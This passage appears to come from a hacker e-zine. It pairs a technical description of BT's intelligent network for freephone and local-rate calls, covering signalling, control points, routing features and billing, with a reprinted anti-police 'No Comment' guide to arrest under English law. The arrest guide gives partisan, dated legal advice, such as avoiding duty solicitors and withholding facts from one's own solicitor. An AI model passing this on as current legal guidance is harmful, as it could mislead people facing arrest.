  1456.            │ C │       ┌────────────C7BT────────────│││       │ C │
  1457.            N E B       │┌───────VOICE TRUNKS────────│││       N E B
  1458.            │ │ │       ││┌──────────────────────────│││       │ │ │
  1459.            A T T       │││                          │││       A T T
  1460.            │ R │       │││                          │││       │ R │
  1461.            │ U │       │││                          │││       │ U │
  1462.            │ N │       │││                          │││       │ N │
  1463.            │ K │       │││                          │││       │ K │
  1464.            │ S │       │││                          │││       │ S │
  1465.           ┌┴─┴─┴───────┴┴┴┐                        ┌┴┴┴───────┴─┴─┴┐
  1466. ──T──T──T─┤               ├───T───────T────────T───┤               ├─T───T───T──
  1467.           │     ACP       │                        │   ACP / HOST  │
  1468. ───C7BT───┤               ├─────────C7BT───────────┤               ├───C7BT─────
  1469.   (PSTN)  └───────────────┘                        └────────────┬─┬┘  (PSTN)
  1470.                                                                 C T
  1471.                                                                 7 T
  1472.                                                                 N T
  1473.  ─T─T─T─ = VOICE TRUNKS                                         A │
  1474.                                                                 │ │
  1475.                                                               ┌─┴─┴─┐
  1476. ACP      ACTION CONTROL POINT                                 │ NSC │
  1477. STEP     SIGNAL TRANSFER AND END POINT                        └─────┘
  1478. C7BT     CCITT #7 SIGNALLING (BT)
  1479. NCP      NETWORK CONTROL POINT
  1480. NSC      NETWORK SERVICES COMPLEX
  1481. C7NA     C7 NORTH AMERICAN
  1482.  
  1483. (Only four switching nodes are shown for simplicity)
  1484.  
  1485.  
  1486.  
  1487.  Action Control Point
  1488.  --------------------
  1489.         The Action Control Points (ACPs) are the 5ESS-PRX Switching Nodes,
  1490.  which serve as transit and terminating nodes for DDSN traffic. All ACPs are
  1491.  fully interconnected by digital line systems and CCITT #7 (BT) common channel
  1492.  signalling. The CCITT #7 (BT) signalling links are used exclusively for
  1493.  setting up speech paths both within the DDSN and between the DDSN and the
  1494.  PSTN.
  1495.  
  1496.         A Second totally independent common channel signalling network,
  1497.  utilising a proprietary form of #7 signalling (C7 North American), is used
  1498.  for transporting non-circuit related signalling methods between the ACPs and
  1499.  the Network Control Points (NCPs). This network is used only for advanced
  1500.  feature calls. Two of the ACPs have been nominated as a signal transfer
  1501.  and end point (STEP) and funnel the signalling traffic from the remaining
  1502.  ACPs to the NCPs. ACPs load share the C7NA signalling messages across both
  1503.  STEPs in the ACP-to-NCP direction, and the NCPs load share the signalling
  1504.  messages across both STEPs in the reverse direction.
  1505.  
  1506.  Network Control Point
  1507.  ---------------------
  1508.        The Network Control Point (NCP) constitutes the core of the intelligent
  1509.  network and holds the data defining the treatment for specific advanced
  1510.  feature calls. NCPs are always provided in mated pairs.
  1511.  
  1512.         Each NCP consists of a duplex processor, duplicated hard discs for
  1513.  data storage, tape drives and interfaces to the other network elements
  1514.  through a Local Area Network. This network, called the Common Network
  1515.  Interface, consists of the signalling terminals for the C7NA links from the
  1516.  STEP nodes and two peripheral controllers which communicate with the duplex
  1517.  processor. The common network interface ring (Figure 4) is automatically
  1518.  reconfigured under fault conditions to isolate the faulty section.
  1519.  
  1520. Figure 4 : Common Network Interface Ring
  1521.  
  1522. ┌──────────┐                                                 ┌──────────┐
  1523. │ ACP/STEP │                                                 │ ACP/STEP │
  1524. └──┬────┬──┘                    ┌──────┐                     └──┬────┬──┘
  1525. ┌──│────│─┐    ┌────────────────┤      ├──────────<──────┐      │    │
  1526. ├─────────┘    │                │ RPCN │                 │      │    │
  1527. │  │    7      │  ┌─────────────┤      ├─────────>────┐  │      │    │
  1528. │  │    N      │  │             └───┬──┘              │  │      │    │
  1529. │  │    A     ┌┴──┴┐                │                 │  │      │    │
  1530. │  C    └─────┤ LN │                │                 │  │      │    │
  1531. │  7          └┬──┬┘                │                 │  │      C    │
  1532. │  N           │  │                 │                 │  │      7    │
  1533. │  A           │  │           ┌─────┴─────┐           │  │      N    │
  1534. │  │          ┌┴──┴┐          │  CENTRAL  │          ┌┴──┴┐     A    C
  1535. │  └──────────┤ LN │          │ PROCESSOR │          │ LN ├─────┘    7
  1536. │             └┬──┬┘          └─────┬─────┘          └┬──┬┘          N
  1537. │              │  │                 │                 │  │           A
  1538. │              │  │                 │                 │  │           │
  1539. │              │  │                 │                ┌┴──┴┐          │
  1540. │  SIGNALLING  │  │                 │                │ LN ├──────────┘
  1541. └─   LINKS     │  │   RING 1    ┌───┴──┐             └┬──┬┘
  1542.                │  └────<────────┤      ├──────────────┘  │
  1543.                │                │ RPCN │                 │
  1544.                └────────>───────┤      ├─────────────────┘
  1545.                       RING 0    └──────┘
  1546.  
  1547.  LN      LINK NODE
  1548.  RPCN    RING PERIPHERAL CONTROLLER NODE
  1549.  
  1550.  
  1551.         Advanced freephone call handling data is duplicated both within and
  1552.  and between  each NCP in the mated pair. Call routing queries from the ACPs
  1553.  are balanced between the two NCPs by designating specific dialled codes to
  1554.  each NCP, and the decision on which NCP to query is taken at the ACP where
  1555.  the call entered the DDSN network. Although data is held on both NCPs,
  1556.  the secondary NCP is only accessed if the primary is not available. Under
  1557.  these conditions, the remaining NCP is capable of handling 100% of the load.
  1558.  This architecture virtually guarantees 100% service availability.
  1559.  
  1560.         Automatic network management controls initiated by the NCP maintain
  1561.  the integrity of the intelligent network under overload conditions by sending
  1562.  code gapping messages instructing the ACPs to throttle back on the number of
  1563.  queries being forwarded to the NCP and defining the treatment for failed
  1564.  calls.
  1565.  
  1566.  
  1567.  Network Services Complex
  1568.  ------------------------
  1569.         The Network services complex (NSC) provides the capability to give
  1570.  callers standard or customised interactive spoken information pertaining
  1571.  to the number called, such as, call prompting, courtesy response and
  1572.  call queing announcements. During or after a call prompting announcement
  1573.  the caller may communicate with the NSC by keying-in appropriate digits
  1574.  on an MF keyphone or keypad. The NSC can collect up to 15 digits which it
  1575.  forwards, via its host ACP, to the NCP via a C7NA common channel signalling
  1576.  link.
  1577.  
  1578.         Initially, two NSCs loaded with the same announcements have been
  1579.  provided in the DDSN intelligent network and are co-located with the NCPs.
  1580.  Each NSC can handle 60 simultaneous calls and provide up to 2000 different
  1581.  announcements which are stored on triplicated moving head discs. In the
  1582.  even of an NSC failure, calls requiring these features are routed to the
  1583.  remaining NSC.
  1584.  
  1585.         The NSC architecture is given in Figure 5.
  1586.  
  1587. Figure 5 : Network Services Complex Architecture
  1588.  
  1589.      ┌───────────────┐
  1590.      │  ACP / HOST   │
  1591.      └───┬───────┬───┘
  1592.          T       C
  1593.          │       7
  1594.          T       N
  1595.          │       A
  1596.          T       │                                        ┌────────────┐
  1597.      ┌───┴───────┴───┐                                    │ SIGNALLING │
  1598.      │   TIME-SLOT   ├────────────────────────────────────┤    LINK    │
  1599.      │  INTERCHANGE  ├────────────────────┐               │  TERMINAL  │
  1600.      └───┬───────┬───┘                    │               └──────┬─────┘
  1601.          │       │                        │                      │
  1602.          │       │                        │                      │
  1603.          │       │                        │                      │
  1604.          │       │                        │                      │
  1605.          │       │                        │                      │
  1606.          │       └──────────────┐         │                      │
  1607.          │                      │         │               ┌──────┴──────┐
  1608.          │      ┌─────────────────────┬───┴───────────────┤  PROCESSOR  │
  1609.          │      │               │     │                   └─────────────┘
  1610.        ┌─┴──────┴──┐            │     │
  1611.        │   DATA    │            │     │
  1612.        │  STORAGE  │            │     │
  1613.        │   UNITS   │            │     │
  1614.        └─────┬─────┘         ┌──┴─────┴─┐
  1615.          ┌───┴───┐           │  TONE    │
  1616.          │ DISCS │           │ RECEIVER │
  1617.          └───────┘           │  UNITS   │
  1618.                              └──────────┘
  1619.  
  1620.  
  1621.  ADVANCED FEATURES
  1622.  =================
  1623.         The DDSN Intelligent Network will permit a range of new features
  1624.  to be offered as Advanced LinkLine to LinkLine service providers. These
  1625.  include (Advanced LinkLine feature name is in brackets) :
  1626.  
  1627.   o Time and Day Routing - The routing of calls can be made dependant on the
  1628.     time of day, day of week and week of the year. (TimeLink / DayLink)
  1629.  
  1630.   o Call Allocator - This provides the capability to route incoming calls
  1631.     proportionally to a number of service provider destinations and / or
  1632.     announcements. (DistributionLink)
  1633.  
  1634.   o Call Queuing - This provides queues for calls at the originating ACP
  1635.     when all available lines to a service provider destination are engaged.
  1636.     An announcement informs the caller of the call status. (QueueLink)
  1637.  
  1638.   o Call Barring - This feature allows service providers to define the
  1639.     treatment of a particular Advanced LinkLine number based on where the
  1640.     call origniated in the PSTN. (AreaLink)
  1641.  
  1642.   o Alternative Destination on Busy - When a busy condition is encountered
  1643.     and no queuing is define, an alternative destination may be chosen
  1644.     automatically. (BusyLink)
  1645.  
  1646.   o Call Prompter - Announcements will prompt callers to enter digits on
  1647.     their telephone set in order to realise caller interactive routing.
  1648.     (SelectLink)
  1649.  
  1650.   o Courtesy Response - If no destination can be reached, for example, due
  1651.     to an unattended office, a pre-defined standard or customised announcement
  1652.     may be played. (CourtesyLink)
  1653.  
  1654.   o Command Routing - This feature allows the service provider to instruct
  1655.     British Telecom to redirect calls to a preset alternate set of
  1656.     destinations. This is intended for emergency and other contingency
  1657.     situations. (CommandLink)
  1658.  
  1659.  CALL ROUTING PLANS
  1660.  ==================
  1661.         The true power of intelligent network call processing is not solely
  1662.  its list of advanced features, but combinations of the feature set which
  1663.  can be defined to meet a service provider's own unique telecommunications
  1664.  needs and, consequently, buisness requirements. An example of a simple call
  1665.  routing plan is shown in Figure 6. The data defining the call treatment(s)
  1666.  for a service provider are held in the NCP database in a service provider
  1667.  record.
  1668.  
  1669.  
  1670. Figure 6 : Combining service features
  1671.  
  1672.                                                       DIAL PULSE     ▄▄▄▄▄▄▄▄
  1673.                                                      NO  RESPONSE    ▀ ▄▄▄▄ ▀
  1674.                                                ┌───────────────────────█░░█
  1675.                                                │                     OPERATOR
  1676.                         SELECTLINK             │
  1677.             ╔════════════════════════════════╗ │
  1678.             ║ "KEY 1 FOR COMMERCIAL LOANS,   ║ │                     ▄▄▄▄▄▄▄▄
  1679.             ║  KEY 2 FOR CONSUMER LOANS..."  ║ │        DIGIT #1     ▀ ▄▄▄▄ ▀
  1680.             ╚════════════════════════════╤═══╝ ├───────────────────────█░░█
  1681.                                                │                   COMMERCIAL
  1682.                                          └ ─   │                      LOANS
  1683.                                             │  │
  1684.         DAYLINK           AREALINK         ┌┴──┴────┐                ▄▄▄▄▄▄▄▄
  1685.        ┌──────┐ MON - FRI ┌───────┐ LONDON │  WHAT  │   DIGIT #2     ▀ ▄▄▄▄ ▀
  1686. ───>───┤ WHAT ├───────────┤ WHAT  ├────────┤   MF   ├──────────────────█░░█
  1687.        │ DAY? │           │ AREA? │        │ DIGIT? │               CONSUMER
  1688.        └──┬───┘           └──┬────┘        └───┬────┘                 LOANS
  1689.           │                  │                 │
  1690.           │                  │                 │
  1691.           │                  │                 │                     ▄▄▄▄▄▄▄▄
  1692.           │                  │                 │        DIGIT #3     ▀ ▄▄▄▄ ▀
  1693.           │                  │   ALL           └───────────────────────█░░█
  1694.           │                  │  OTHER                                 OTHER
  1695.           │                  │
  1696.           │                  │
  1697.           │                  │
  1698.           │                  │                                       ▄▄▄▄▄▄▄▄
  1699.           │                  │                                       ▀ ▄▄▄▄ ▀
  1700.           │                  └─────────────────────────────────────────█░░█
  1701.           │                                                          BRISTOL
  1702.           │                                                          BRANCH
  1703.           │
  1704.           │ SATURDAY
  1705.           │   AND            ╔══════════════════╗
  1706.           │  SUNDAY          ║ "ALL OFFICES ARE ║
  1707.           └──────────────────╢  CLOSED FOR THE  ║
  1708.                              ║  WEEKEND..."     ║
  1709.                              ╚══════════════════╝
  1710.                                  COURTESYLINK
  1711.  
  1712.  
  1713.  SERVICE ADMINISTRATION
  1714.  ======================
  1715.         Service Administration for Advanced LinkLine features is handled
  1716.  by the network subscriber transaction, administration and recording system
  1717.  (NETSTAR), which has on-line access to the NCPs. NETSTAR provides user
  1718.  friendly access to the NCP advanced feature database to modify, create or
  1719.  delete service provider call routing plans via dedicated or dialup/dialback
  1720.  links to VDUs. An NCP can have only one active call routing plan for any
  1721.  service provider number, but additional plans may be prepared and held in
  1722.  NETSTAR for transmission to, and activation at, the NCP when required.
  1723.  NETSTAR holds security backup copies of all call routing plans and NCP
  1724.  operating parameters.
  1725.  
  1726.  CALL PROCESSING
  1727.  ===============
  1728.  
  1729.  Derivation of the Calling Subscriber Geography (CSG)
  1730.  ----------------------------------------------------
  1731.         All 0800 and 0345 calls are routed via a DMSU to a DDSN action control
  1732.  point (ACP) (Figure 7). During Call set-up, the ACP requests additional
  1733.  set-up information to be sent via the C7BT Link. This cause the calling
  1734.  line identity (CLI) to be forwarded from the first exchange in the call
  1735.  path with C7BT signalling.
  1736.  
  1737. Figure 7 : Access to the Digital Derived Services Network
  1738.  
  1739.  
  1740.  
  1741.               PSTN                                    DDSN
  1742. ┌──────────────┴────────────────┐┌──────────────────────┴─────────────────────┐
  1743.  ┌───────┐           ┌──────────┐           ┌──────────┐           ┌──────────┐
  1744.  │  DLE  ├────C7BT───┤          ├────C7BT───┤          ├────C7BT───┤          │
  1745.  │   or  │           │   DMSU   │           │ 5ESS-PRX │           │ 5ESS-PRX │
  1746.  │ E-ALE ├─T─T─T─T─T─┤          ├─T─T─T─T─T─┤   (ACP)  ├─T─T─T─T─T─┤   (ACP)  │
  1747.  └───────┘ ┌─────────┤          │           │          │           │          │
  1748.  ┌───────┐ │         └──────────┘           └────┬─────┘           └────┬─────┘
  1749.  │ AMSU/ ├─┘                                     │                      │
  1750.  │ +ALE  │                                       │                      │
  1751.  └───────┘                                       │                      │
  1752.                                                  ┴                      ┴
  1753.                                                 SP                     SP
  1754.  
  1755.  * ALE may be via a digital concentrator centre exchange
  1756.    E-ALE : Enhanced analogue Local Exchange (C7BT signalling capability)
  1757.  
  1758.  
  1759.         If a call is originated from a local exchange with C7BT signalling,
  1760.  a full calling line identity (FCLI) is returned to the ACP. The FCLI
  1761.  includes the caller's national number group (NNG) code, or all figure
  1762.  numbering (AFN) code in the case of a director area.
  1763.  
  1764.         If the call is originated from an analogue local exchange (ALE),
  1765.  then a partial calling line identity (PCLI) is derived by the first
  1766.  digital exchange in the call path. This will normally be a DMSU, but in
  1767.  cases where an ALE is parented on a digital concentrator centre exchange
  1768.  (DCCE), the DCCE generates the PCLI. A PCLI must comprise sufficient
  1769.  information to uniquely identify the digital entry point to the PSTN
  1770.  used by that ALE. This information includes the region, area and unit
  1771.  identity portions of the network nodal identity plus the telephony process
  1772.  number and route numbers used by the call processing software of the
  1773.  digital exchange.
  1774.  
  1775.         Whe a PCLI or FCLI is received by a DDSN action control point, the
  1776.  call processing software searches through a set of look-up tables for a
  1777.  comparison with the CLI sent. This search will result in the calling
  1778.  subscriber geography (CSG) being identified.
  1779.  
  1780.         Figures 8 and 9 illustrate the CLI and CSG derivation process.
  1781.  
  1782. Figure 8 : CLI derivation
  1783.  
  1784.  
  1785.  ┌───────┐     ┌────────────┐          ┌────────────┐         ┌────────────┐
  1786.  │  DLE  ├─<─────────┐ DMSU │          │  5ESS-PRX  ├─────────┤  5ESS-PRX  │
  1787.  │ E-ALE │     │     │      │          │    (ACP)   │         │    (ACP)   │
  1788.  └───────┘     │     │      │          │            │         │            │
  1789.                │     ├────────────<───────────┐     │         │            │
  1790.                │     │      │          │      │     │         │            │
  1791.  ┌───────┐     │     │      │          │  REQUEST   │         │            │
  1792.  │  ALE  │ ?─────────┘      │          │    CLI     │         │            │
  1793.  └───────┘     └────────────┘          └────────────┘         └────────────┘
  1794.  
  1795.  
  1796. Figure 9 : CSG derivation
  1797.  
  1798.  
  1799.  ┌───────┐     ┌────────────┐          ┌────────────┐         ┌────────────┐
  1800.  │ FCLI ───>─────────┐ DMSU │          │  5ESS-PRX  ├─────────┤  5ESS-PRX  │
  1801.  │  DLE  │     │     │      │          │    (ACP)   │         │    (ACP)   │
  1802.  └───────┘     │     │      │   FCLI   │            │         │            │
  1803.                │     ├────────────>────────CLI/CSG  │         │            │
  1804.                │     │      │   PCLI   │    TABLES  │         │            │
  1805.  ┌───────┐     │     │      │          │      │     │         │            │
  1806.  │  ALE  │PCLI─>─────┘      │          │     CSG    │         │            │
  1807.  └───────┘     └────────────┘          └────────────┘         └────────────┘
  1808.  
  1809.  
  1810.  Global Title Translation
  1811.  ------------------------
  1812.         Call processing for service providers with basic features is handled
  1813.  within the DDSN switching nodes. To differentiate between calls to SPs with
  1814.  advanced and basic features, the ACP checks for the existence of a
  1815.  translation for the number dialled. If a translation exists, the call is
  1816.  routed to the specified network termination. If the translation does not
  1817.  exist, call handling instructions are returned from the NCP database in
  1818.  response to a query message from the originating ACP. A number of query
  1819.  messages are neccesary for some types of call; the initial query is therefore
  1820.  termed QRY1. The process is illustrated in Figures 10 and 11.
  1821.  
  1822.  
  1823. Figure 10 : DDSN           ┌─────────────────┐
  1824. Intelligent Network call   │ INCOMING CALL   │
  1825. Processing (Call not       │   FROM PSTN     │
  1826. requiring NSC and no       │ DIGITS RECEIVED │
  1827. network controls active)   │ AT ORIGINATING  │  ( OR (0) 345 DEFGHJ )
  1828.                            │     ACP         │
  1829.                            │ (0)800 345800   │
  1830.                            └───────┬─────────┘
  1831. GTT : GLOBAL               ┌───────┴─────────┐
  1832.       TITLE                │  ACP REQUESTS   │
  1833.       TRANSLATION          │   ADDITIONAL    │  ( SEE FIGURE 8 )
  1834.                            │  SET-UP INFO    │
  1835.                            │  VIA C7BT LINK  │
  1836.                            └───────┬─────────┘
  1837.                            ┌───────┴─────────┐
  1838.                            │   FCLI OR PCLI  │ ( SEE FIGURE 8 )
  1839.                            │   FORWARDED TO  │            ┌─────────────────┐
  1840.                            │      ACP        │            │ ORIGINATING ACP │
  1841.                            └───────┬─────────┘            │      DEALS.     │
  1842.                            ┌───────┴─────────┐     YES    │   CALL SETUP    │
  1843.                            │ TRANSLATION HELD├──────>─────┤ NORMALLY USING  │
  1844.                            │     AT ACP      │            │    C7BT LINK    │
  1845.                            └───────┬─────────┘            └─────────────────┘
  1846.                                     NO                   ┌────────────────┐
  1847.                       NO   ┌───────┴─────────┐  YES       │    SEND QRY1   │
  1848.            ┌───────────<───┤   IS 0800-345   ├───>────────┤ MESSAGE TO NCP │
  1849.            │               │ DEFINED IN GTT? │            │    VIA C7NA    │
  1850.            │               └─────────────────┘            │       LINK     │
  1851.                           ┌─────────────────┐            └───────┬────────┘
  1852.            │               │ SEND A FINAL    │            ┌───────┴────────┐
  1853.            │               │ TREATMENT OF    │    NO      │ IS A PLAN HELD │
  1854.            ├───────────────┤'VACANT CODE' TO ├─────<──────┤ AT NCP FOR 800 │
  1855.            │               │ ACP             │            │ 345800?        │
  1856.            │               └─────────────────┘            └───────┬────────┘
  1857.            │                                                       YES
  1858.                                                       ┌──────────┴──────────┐
  1859.            │                                           │ NCP DETERMINES      │
  1860.            │                                           │ CALL TREATMENT.     │
  1861. ┌──────────┴────────────────┐                          │ BILLING AND ROUTING │
  1862. │     'VACANT CODE'         │                          │ DETAILS TO ACP      │
  1863. │  NUMBER UNOBTAINABLE TONE │                          │ VIA C7NA            │
  1864. │      RETURNED             │                          └──────────┬──────────┘
  1865. └───────────────────────────┘                          ┌──────────┴──────────┐
  1866.                                                        │ ORIGINATING NCP     │
  1867.                                                        │ SETS UP CALL USING  │
  1868.                                                        │ C7BT LINK           │
  1869.                                                        └─────────────────────┘
  1870.  
  1871. Figure 11 : ACP Communication with NCP
  1872.  
  1873.  ┌─────────────┐
  1874.  │   (ACP 1)   │
  1875.  │ TRANSLATION │
  1876.  │  NOT HELD   │
  1877.  │     ─       │
  1878.  │             │                                           ┌──────────────────┐
  1879.  │ 0800 DEF    │                                           │       NCP        │
  1880.  │ IN GTT      │                                           ├────┬─────────────┤
  1881.  │     =       │                ┌─────────────┐            │ C  │  ┌─────────┐│
  1882.  │             │                │ (ACP 2) ┌───┤            │ N  │  │   SP    ││
  1883.  │ SEND QRY1   ──>───C7NA───>─────────────┤ S ├─>─C7NA─>───┤ I  ├>─┤ RECORD  ││
  1884.  │  TO NCP     │                │         │ T │            │ R  │  └────┬────┘│
  1885.  ├─────────────┤                │         │ E │            │ I  │       │     │
  1886.  │   BILLING   ──<───C7NA───<─────────────┤ P ├─<─C7NA─<───┤ N  ├<──────┘     │
  1887.  │ INSTRUCTIONS│                └─────────┴───┘            │ G  │ PROCESSOR   │
  1888.  │      +      │                ┌─────────────┐            └────┴─────────────┘
  1889.  │    ROUTE    │                │  (ACP n)    │
  1890.  │   MESSAGE   │                │ CALL SET-UP │
  1891.  │     OR      │                │COMPLETED TO │
  1892.  │    FINAL   ───────C7BT───────┤ SERVICE     ├──────────── SP
  1893.  │  TREATMENT  │                │ PROVIDER    │
  1894.  └─────────────┘                └─────────────┘
  1895.  
  1896.  
  1897. ACP 1 = ACP receiving call from PSTN
  1898. ACP 2 = ACP with directly connected NCP
  1899. ACP n = The ACP on which the SP is terminated
  1900.  
  1901.  
  1902.         The QRY1 message includes:
  1903.  
  1904.  a) 10 digit dialled number, which excludes any leading 0 but includes a
  1905.     trailing 0 as padding if only 9 digits long.
  1906.  
  1907.  b) Calling subscriber geography (CSG).
  1908.  
  1909.  c) The ACP which originated the query. This is used to reference a table
  1910.     in the NCP which defines the capabilities of the ACP,; for example,
  1911.     whether it has an NSC.
  1912.  
  1913.  d) The destination of the query.
  1914.  
  1915.  The route message includes a network code of up to 10 digits which is used
  1916.  by the ACP to route the call to its destination. This is normally a service
  1917.  provider (SP) line, but can be an NSC announcement.
  1918.  
  1919.         A final treatment command is sent to the ACP when the NCP cannot
  1920.  route a call normally. The final treatment command results in either a tone
  1921.  or an announcement being returned to the caller.
  1922.  
  1923.  Calls Requiring an NSC
  1924.  ----------------------
  1925.         As not all ACPs are hosts to an NSC, a call which requires an NSC at
  1926.  some point during the call treatment must be setup in two parts. After the
  1927.  QRY1 Message, the call is routed to an ACP/HOST, using C7BT in the normal
  1928.  manner, where a voice trunk to the NSC is allocated. This action is termed
  1929.  a 'service assist' if the NSC is required as intermediate step in the call
  1930.  treatment (SelectLink) or a 'hand-off' if the NSC is required to play an
  1931.  announcement as the final routing conclusion (CourtesyLink). During a
  1932.  service assist or a hand-off, the ACP/HOST then queries the NCP a second
  1933.  time (QRY2) with details of the NCP and call number used for the QRY1
  1934.  message. The call treatment now continues with a list of commands being sent
  1935.  from the NCP to the NSC. This could be to play an announcement and collect
  1936.  digits from the caller. NCP/NSC communication takes place via the C7NA
  1937.  links with any digits collected being returned to the NCP to determine the
  1938.  final disposition of the call.
  1939.  
  1940.  CALL LOGGING
  1941.  ============
  1942.         In response to a query message from the originating ACP, the NCP
  1943.  returns a billing command instructing the ACP what details to record;
  1944.  the ACP acknowledges receipt of the instructions to the NCP. On answer,
  1945.  the terminating exchange sends a message to the originating ACP giving
  1946.  either 'answer / no charge' or 'answer / charge' depending on which LinkLine
  1947.  (0800/0345) is defined. On Call termination, the ACP records the details
  1948.  of the call in an automatic message accounting (AMA) record.
  1949.  
  1950.         The originating ACP normally controls the call and is responsible
  1951.  for generating an automatic message accounting record. These records are
  1952.  periodically polled by an on-line data collector which validates them
  1953.  before passing them to an off-line charge raising system which calculates
  1954.  call charges in preparation for the production of the service provider's
  1955.  bill. Where a 'hand-off' has occurred, the ACP/HOST takes over control
  1956.  of the call for supervisory and logging purposes.
  1957.  
  1958.  OPERATIONS AND MAINTENNANCE
  1959.  ===========================
  1960.         The Multi-Function Operations System (MFOS) is central to the
  1961.  operations and maintennance fucntions for the DDSN intelligent network.
  1962.  These functions include:
  1963.  
  1964.         o On-line access to the ACPs/NCPs/NSCs
  1965.         o Alarm Collection and Monitoring
  1966.         o Collection and analysis of traffic data
  1967.         o Real time Network management
  1968.  
  1969.  Connection between the multi-function operations system processors, the
  1970.  network elements and the users is achieved using a virtual circuit switch
  1971.  for flexibility.
  1972.  
  1973.  /////  /////   /////   /////   /////   /////   /////   /////   /////   /////
  1974.  
  1975. .
  1976. :
  1977. |
  1978. +-+[ being arrested in th uk ]+---> by bodie <-------------------------------+
  1979. +-+[ D4RKCYDE                ]+---> bodi3@usa.net <--------------------------+
  1980.                                                                              |
  1981.                                                                              :
  1982.                                                                              .
  1983. NO COMMENT - A DEFENDENTS GUIDE TO ARREST
  1984. Reprinted from booklet by AK Disrtibution
  1985. by Bodie - <Bodi3@usa.net>
  1986.  
  1987. ******
  1988. This information is primaraly based on the english legal system.  Although 
  1989. most of the information is valid for other countries including the US
  1990. ******
  1991.  
  1992. GETTING ARRESTED IS NO JOKE
  1993.  
  1994. It's a serious business. All convictions add up: eg, if your arrested 3 times
  1995. for shoplifting, you stand a good chance of getting sent down. If theres a
  1996. chance of you getting nicked, get your act together: know what to do in case
  1997. you're arrested. Unless you enjoy cells, courtrooms and prisons, you owe it
  1998. to yourself to wise up.
  1999.  
  2000. WHEN YOU HAVE BEEN ARRESTED
  2001.  
  2002. You have to give the police your NAME, ADDRESS and your DATE OF BIRTH. They
  2003. also have the right to take your fingerprints and other non-intermate body
  2004. samples. The Criminal Justice and Public Order Act 1994 has now removed the
  2005. traditional 'Right to Silence' (from April 10th 1995). Howver, all this
  2006. means is that the police/prosecution can point to your refusal to speek to
  2007. them when the case comes to court, and the court MAY take this as evidence
  2008. of your guilt. THE POLICE CAN NOT FORCE YOU TO SPEEK OR MAKE A STATEMENT,
  2009. WHATEVER THEY SAY TO YOU IN THE STATION. Refusing to speek cannot be used
  2010. to convict you by itself.
  2011.  
  2012. It's yet to be seen how the police will use this change in the law but we
  2013. reckon the best policy IF YOU WANT TO GET OFF is to REMAIN SILENT. The best
  2014. place to work out a good defence is afterwards, with your solicitor or
  2015. witnesses, not under pressure in the hands of the cops. If yout refusal to
  2016. speek comes up in court, the best defence we think is to refuse to speek
  2017. until your solicitor gets there, then get them to agree your position. You
  2018. can then say you acted on legal advice. KEEPING SILENT IS STILL THE BEST
  2019. THING TO DO IN POLICE CUSTODY.
  2020.  
  2021. REMEMBER: ALL CHARGES ADD UP.
  2022.  
  2023. Q: WHAT HAPPENS WHEN I GET ARRESTED?
  2024. When you are arrested, you will be taken to a police station, you will be
  2025. asked your name, address and date of birth. Your personal belongings will
  2026. be taken from you. These are listed on the custardy record and usually you
  2027. will be asked to sign that the list is correct. You should sign immediately
  2028. below the last item, so the cops can't add something incriminating to the
  2029. list. You should also refuse to for something which isn't yours, or which
  2030. could be incriminating. You will then be placed in a cell until the police
  2031. are ready to deal with you
  2032.  
  2033. Q: WHEN CAN I CONTACT A SOLICITOR?
  2034. You should be able to ring a solicitor as soon as you've been arrested. 
  2035. Once at the police station it is once of the first things you should do, for
  2036. two reasons:
  2037. 1. To have someone know where you are
  2038. 2. To show the cops you are not going to be a soft target, they may back off
  2039. a bit.
  2040.  
  2041. It is advisable to avoid using the duty solicitor as they are often either
  2042. crap or hand in glove with the cops. It's worth finding the number of a
  2043. good solicitor in your area and memorising it. The police are wary of
  2044. decent solicitors. Also avoid telling your solicitor exactly what happened:
  2045. this can be sorted out later. For the time being, tell him you are refusing
  2046. to speek. Your solicitor can come into the police station while the police
  2047. interview you: you should refuse to be interviewed unless your solicitor is
  2048. present.
  2049.  
  2050. Q. WHAT IS AN INTERVIEW
  2051. An interview is the police questioning you about the offences they want to
  2052. charge you with. The interview will usually take place in an interview room
  2053. in the police station. An interview is only of benefit to the police. 
  2054. Remember they want to prosecute you for whatever charges they can stick on
  2055. you.
  2056. THE INTERVIEW IS A NO WIN SITUATION. For your benefit the only thing to be
  2057. said in an interview is 'No Comment'
  2058. Remember: THEN CAN'T LEGALLY FORCE YOU TO SPEEK
  2059.  
  2060. Q: WHY DO THE POLICE WANT ME TO ANSWER QUESTIONS?
  2061. IF THE POLICE THINK THEY HAVE ENOUGH EVIDENCE AGAINST YOU THEY WILL NOT NEED
  2062. TO INTERVIEW YOU. eg, in most public order arrests they rely on witness
  2063. statements from 1 or 2 cops or bystanders, you won't even be interviewed. The
  2064. police want to convict as many people as possible because:
  2065. 1. They want to convict you because it makes it look like they're doing a
  2066. good job at solving crime. The 'clear-up rate' is very important to the cops,
  2067. they have to be seen to be doing their job. The more crimes they get
  2068. convictions for, the better it looks for them.
  2069. 2. Police officers want promotion, to climb the ladder of hierarchy. Coppers
  2070. get promotion through the number of crimes they 'solve'. No copper wants to
  2071. be a bobby all their life.
  2072. A 'solved crime' is a conviction against somebody. You only have to look at
  2073. such cases as the Birmingham 6 to understand how far the police will go to
  2074. get a conviction. Fitting people up to boost the 'clear-up rate' and at the
  2075. same time removing people the cops don't like is a widespread part of all
  2076. police forces.
  2077.  
  2078. Q: SO IF THE POLICE WANT TO INTERVIEW ME, IT SHOWS I COULD BE IN A GOOD
  2079. POSITION?
  2080. Yes, they may not have enough evidence, and hope you'll implicate yourself
  2081. or other people
  2082.  
  2083. Q: AND THE WAY TO STAY IN THAT POSITION IS TO REFUSE TO BE DRAWN INTO A
  2084. CONVERSATION AND ANSWER "NO COMMENT" TO ANY QUESTIONS?
  2085. Exactly
  2086.  
  2087. Q: BUT WHAT IF THE EVIDECE LOOKS LIKE THEY HAVE GOT SOMETHING ON ME?
  2088. WOULDN'T IT BE BEST TO EXPLAIN AWAY THE CIRCUMSTANCES I WAS ARRESTED IN, SO
  2089. THEY'LL LET ME GO?
  2090. The only evidence that matters is the evidence presented in court to the
  2091. magistrate or judge. The only place to explain everything is in court. If
  2092. they've decided to keep you in, no ammount of explaining will get you out. 
  2093. If the police have enough evidence, anything you say can only add to the
  2094. evidence against you.
  2095. When the cops interview someone, they do all they can to confuse and
  2096. intimidate you. The questions may not be related to the crime. Their aim
  2097. is to soften you up, get you chatting. Don't answer a few small talk
  2098. questions and then clam up when they ask you a question about the crime.
  2099. It looks worse in court.
  2100.  
  2101. To prosecute you, the police must present their evidece to the Crown
  2102. Prosecution Service. A copy of the evidence will be sent to your solicitor. 
  2103. The evidence usually rests on very small points: this is why it's important
  2104. not to give anything away in custody. If they don't have enough evidence
  2105. the case could be thrown out of court or never even get to court.
